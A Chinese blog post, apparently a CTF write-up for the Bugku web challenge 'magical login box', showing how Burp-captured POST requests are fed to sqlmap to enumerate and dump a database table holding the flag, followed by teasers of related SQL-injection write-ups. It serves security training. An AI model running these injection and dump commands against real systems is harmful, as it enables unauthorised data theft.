这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)

最新推荐文章于 2026-05-22 16:57:43 发布
原创 最新推荐文章于 2026-05-22 16:57:43 发布 · 1w 阅读 · 9 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#CTF

正在学习sqlmap,拿这个题先入门一下。

题目链接:http://120.24.86.145:9001/sql/

先看下源代码:


是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。

首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)


我保存到了D盘的1.txt里。

然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" -p admin_name --dbs

解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字

可以看到sqlmap获得了数据库的名字:


应该是这个bugkul1,再继续爆表,命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables

解释:-D是表示选择了后面的这个数据库 --tables是想获取表

可以看到爆出了表:


应该在flag1这个表里,继续爆列名:

命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

解释类似上面 不过加了一个-T 指定表

可以发现爆出了列名:


flag1这个列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

解释:同上面 --dump是获取字段的命令

(在这过程中可能会让你选择Y或者N 我直接回车的)

可以看到爆出了flag:


Risker_GML
关注
CTF逆向(reverse)入门脑图
10-25
CTF逆向(reverse)入门脑图,xmind格式文件。Reverse即逆向工程,目涉及到软件逆向、破解技术等,要求有较强的反汇编、反编译扎实功底。主要考查参赛选手的逆向分析能力。 仅供CTF竞赛参考使用,请不要做违法乱纪的事情
CTF常用后台密码集
08-12
CTF常用后台密码集,可以通过burpsuite进行密码爆破。
一道简单的CTF登录
anquanniu的博客
03-06 8632
一、解感受 这道50分,在实验吧练习场算比较高分,而且通过率只有14%,比较低的水平。 看到这两个数据,一开始就心生惬意,实在不应该呀! 也是因为心态原因,在发现test.php之后,自以为在SQL注入时只要能截断后面的SQL语句,FLAG就在user里面,尝试了一段时间SQL注入都失败后,有些急躁,然后就早早拜读了pcat大神的攻略。。。 在攻略的帮助下,顺利完成目。 所以本文主要是在pc...
bugku ctf 这是一个神奇的登陆框
qq_42777804的博客
08-02 1073
打开后随便输入账号密码会出现 那就老规矩 burp抓包 当你使用 " 时 会报错 !!!tips:之后使用的sql注入是我写的第一篇sql注入格式的内容,感兴趣的可以看一下 https://blog.csdn.net/qq_42777804/article/details/81226567 admin_name=1"&admin_passwd=1&su...
bugku-web-程序员本地网站
最新发布
2503_93690469的博客
05-22 46
如果服务器直接信任该请求头,则存在伪造风险。使用 Burp 抓包后,将请求发送到。因此无法获取 Flag。记录客户端原始 IP。最终返回 Flag。
CTF-Web SQL注入
weixin_52182264的博客
04-26 5645
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
CTF-WEB 一个登录框SQL盲注
热门推荐
weixin_45887311的博客
04-24 1万+
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。 首先找注入点: 发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。 但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了) 开始尝试编写脚本,结果发现简单的reuqests解析不了<div>标签下的内容 ...
CTFshow 1-10关
weixin_62369433的博客
11-11 2549
CTFshow 1-10 通关详解
[bugku]sqlmap部分
ansu1440的博客
10-22 292
目录 [根据校赛的经验来看的话 这种登录的可以先用sqlmap搞一下....] 然后做一个新的web目 可以先给自己预留5min看会不会解, 不要上来就翻答案n 就5min, 可以两个,先做,再补。 其他的,在哪里学习可以换地方,早点起吧,不要让思维僵化了 例1:这是一个神奇登录框 sqlmap要结合burp一起使用;...
Bugku-CTF之这是一个神奇的登陆框
weixin_34166472的博客
06-11 343
Day32 这是一个神奇的登陆框 http://123.206.87.240:9001/sql/ flag格式flag{} 本要点:sqlmap神器使用、burpsuit抓包 查看一下源码 是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。 首先burp抓包,抓到包后选择存到tx...
php没有登录的话打开其他页面提示,2019-03-13 BugkuCTF Writeup之WebWeb4——这是一个神奇登录框)...
weixin_42101237的博客
03-18 404
Web4考察查看网页源代码和escape编码的解码提示“看看源代码吧”,所以看了一下源代码,发现一段JavaScript脚本。不过这段脚本好像是错的,所以直接运行的话运行不了。把它稍微改一改就可以运行了,运行后得到一段JavaScript代码,当然也可以选择不运行,直接解码那些内容,也可以得到这些代码。这段代码如下:function checkSubmit(){var a=document.get...
SQL注入攻防全解析:从入门到精通(含最新SQLMap使用技巧)
weixin_29197835的博客
03-05 33
本文深入解析SQL注入攻防技术,从原理、手工探测到自动化工具应用。详细介绍了SQLMap的最新使用技巧,包括二阶注入测试、篡改脚本绕过WAF及直接连接数据库等高级功能,并系统阐述了从参数化查询到WAF部署的纵深防御策略,帮助安全从业者全面提升攻防实战能力。
DC-1 登录框的sql注入
a_153161的博客
12-04 1418
DC-1登录框的报错注入
HTB_Appointment 靶机之登录框万能密码、sqlmap post 注入
网络安全学习
04-22 4426
⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔ 文章目录先放答案万能密码注入sqlmap post 注入测试是否存在注入查数据库查表查列查数据 先放答案 因为这期问都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了 Structured Query Language SQL Injection personally identifiable information A03:2021-Injection Apache httpd 2.4.38 ((.
利用sqlmap进行需要登录的注入
qq_52358808的博客
09-01 2459
需要登录的注入1.利用bp获取cookie2.利用sqlmap获取用户名密码 1.利用bp获取cookie 2.利用sqlmap获取用户名密码 cookie注入命令:sqlmap.py -u 注入--cookie=”获取的cookie” sqlmap.py -u http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit --cookie=“security=low; PHPSESSID=9djnnv81n3lmgmu4sno9
BugKu-CTF(web)---login2
Nailaoyyds的博客
04-02 4977
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
bugku 这是一个神奇登录框
Superpig的博客
11-19 3420
步骤 1、打开目链接,是一个登录界面,抓包后传数据进行尝试 2、尝试数据 先尝试admin_name=1&amp;amp;admin_passwd=1&amp;amp;submit=GO+GO+GO 得到Try Again! 尝试admin_name=1'&amp;amp;admin_passwd=1&amp;amp;submit=GO+GO+GO 仍然得到Try Again! ,说明 ’ 被过滤了 尝试admin...
一道CTFsql注入的问
carrot11223的博客
01-28 577
打开页面一个登录框,我甚至都没先弱口令登录,直接开始sql测试,结果测到最后发现没有,直接admin/admin就就去了,下次遇到登录框请先测试弱口令,ok?登录成功后:这句话提示中提到了关键词 “flagpwdsqli yyds”,看起来是在暗示可能存在一个密码(password)相关的 SQL 注入(SQLi)漏洞。
6.12ctf练习
weixin_74020633的博客
06-13 1171
"$"表示正则匹配的位置,这里放在了末尾说明在字符串的末尾进行正则匹配,所以只要在"nctfisfun"前面加数字或者字母就行,只要末尾能匹配到要求字符串就行。同时$_REQUEST还具有一个特性,当同时通过POST和GET传参时,如果POST和GET中含有相同的变量时,只会获取POST传参的变量值。GET传参yulige,截取前32位和md5加密后的值相同,其实就是一个md5的强比较,传入数组为空即成立。那么第一层就利用POST传参进行变量覆盖,且post传参的值中不能出现字母,绕过第一层的判断。
mysql 登录框注入_CTF| SQL注入之login界面类
weixin_34609222的博客
01-19 2805
SQL注入CTFWEB方向必不可少的一种型,斗哥最近也做了一些在线目,其中最常见的目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php目来源:hacking lab inject 01~源代码有提...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值